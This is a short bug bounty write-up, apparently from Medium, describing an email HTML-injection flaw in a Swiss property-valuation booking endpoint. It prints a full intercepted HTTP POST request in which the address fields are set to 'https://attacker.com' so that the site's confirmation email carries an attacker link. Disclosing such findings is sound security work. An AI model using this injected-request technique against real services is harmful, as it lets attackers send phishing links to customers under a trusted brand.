Open in app

Sign in

Write

Sign in

Easy Bug | Email HTML Injection

Saeid Khater
2 min readMay 24, 2024

--

Overview of the Vulnerability:

Content spoofing, also known as content injection or HTML injection, is a type of web application vulnerability where an attacker injects malicious content into a web page. This injected content is then rendered by the client’s browser as if it were legitimate content from the trusted website. The attack leverages the inherent trust users place in the brand and the business to manipulate them into taking specific actions.

Steps:

After researching and thinking about all the functions on the site, such as registering for the newsletter or booking hotels and homes, I found the following:

An endpoint that enables me to book the hotel and sends me an email with the details I entered on my email.
This is amazing

  1. The request was intercepted by “Burp Suite”
  2. I tried to inject the HTML code in different ways, but the request becomes “403 Forbidden”
  3. I tried to manipulate the sent data, especially since it cannot be manipulated through the front-end.
  4. I was able to change the variable such as “address” and changed its value to make it a “website” that the victim could be directed to.
POST /property-valuation/valuation-request HTTP/2
Host: api.[Redacted].ch
User-Agent: [Redacted]
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Api-Key: [Redacted]
Content-Length: 446
Origin: [Redacted]
Referer: [Redacted]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers

{"propertyType":1,"offerType":1,"address":{"city":"Bern","countryCode":"CH","postalCode":"3006","street":"https://attacker.com","lat":46.9432455,"lon":7.469297500000001,"formattedAddress":"https://attacker.com"},"livingSpace":100000000000,"lotSize":10,"rooms":1.5,"buildYear":2000,"isRenovated":true,"email":"free@Palestine.com","name":"victim","phoneNumber":"+21234567890","culture":"en-CH","leadId":"53fbe8bc-db09-4c9b-bef6-a177a11db46d"}

Note that it worked

Email in my inbox

Impact:
The email message can be manipulated and customers directed to suspicious links that may ask them to enter sensitive data, which affects your company’s reputation.

Duplicate, Two days before I submitted it :(

Cybersecurity
Bug Bounty
Html Injection

--

--

Saeid Khater
Saeid Khater

Written by Saeid Khater

107 Followers
13 Following

Web Developer | Penetration tester | Bug hunter

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams